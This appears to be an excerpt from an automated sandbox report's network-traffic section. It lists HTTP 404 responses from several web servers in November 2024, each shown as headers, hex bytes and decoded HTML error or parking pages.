                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 07:13:31 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 07:13:37 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 07:13:40 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 07:13:42 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 07:13:45 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 07:13:51 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 68 67 33 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uhg3/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 07:13:53 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 68 67 33 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uhg3/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 07:13:56 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 68 67 33 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uhg3/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 07:13:59 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 68 67 33 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uhg3/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 07:14:12 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closex-ray: p529:0.000Data Raw: 31 37 64 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 54 49 54 4c 45 3e d0 a1 d0 b0 d0 b9 d1 82 20 77 77 77 2e 72 65 64 65 78 2e 66 75 6e 20 d0 bd d0 b5 20 d0 bd d0 b0 d1 81 d1 82 d1 80 d0 be d0 b5 d0 bd 20 d0 bd d0 b0 20 d1 81 d0 b5 d1 80 d0 b2 d0 b5 d1 80 d0 b5 3c 2f 54 49 54 4c 45 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 61 64 6d 2e 74 6f 6f 6c 73 2f 70 61 72 6b 69 6e 67 2d 70 61 67 65 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 61 6e 67 75 61 67 65 73 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 65 6e 27 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 74 69 74 6c 65 27 3a 20 27 57 65 62 73 69 74 65 20 77 77 77 2e 72 65 64 65 78 2e 66 75 6e 20 6e 6f 74 20 63 6f 6e 66 69 67 75 72 65 64 20 6f 6e 20 73 65 72 76 65 72 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 68 31 27 3a 20 27 57 65 62 73 69 74 65 20 77 77 77 2e 72 65 64 65 78 2e 66 75 6e 20 6e 6f 74 20 63 6f 6e 66 69 67 75 72 65 64 20 6f 6e 20 73 65 72 76 65 72 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 2e 6d 65 73 73 61 67 65 31 27 3a 20 27 57 65 62 73 69 74 65 20 3c 62 3e 77 77 77 2e 72 65 64 65 78 2e 66 75 6e 3c 2f 62 3e 20 69 73 20 6e 6f 74 20 63 6f 6e 66 69 67 75 72 65 64 20 6f 6e 20 74 68 65 20 68 6f 73 74 69 6e 67 20 73 65 72 76 65 72 2e 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 2e 6d 65 73 73 61 67 65 32 27 3a 20 27 44 6f 6d 61 69 6e 20 61 64 64 72 65 73 73 20 72 65 63 6f 72 64 20 70 6f 69 6e 74 73 20 74 6f 20 6f 75 72 20 73 65 72 76 65 72 2c 20 62 75 74 20 74 68 69 73 20 73 69 74 65 20 69 73 20 6e 6f 74 20 73 65 72 76 65 64 2e 3c 62 72 3e 49 66 20 79 6f 75 20 68 61 76 65 20 72 65 63 65 6e 74 6c 79 20 61 64 64 65 64 20 61 20 73 69 74 65 20 74 6f 20 79 6f 75 72 20 63 6f 6e 74 72 6f 6c 20 70 61 6e 65 6c 20 2d 20 77 61 69 74 20 31 35 20 6d 69 6e 75 74 65 73 20 61 6e 64 20 79 6f 75 72 20 73 69 74 65 20 77 69 6c 6c 20 73 74 61 72 74 20 77 6f 72 6b 69 6e 67 2e 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 2e 68 65 6c 70 5f 62 75 74 74 6f 6e 27 3a 20 27 48 6f 77 20 63 61 6e 20 49 20 66 69 78 20 74 68 69 73 3f 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sat, 02 Nov 2024 07:14:19 GMTserver: LiteSpeedvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sat, 02 Nov 2024 07:14:22 GMTserver: LiteSpeedvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f
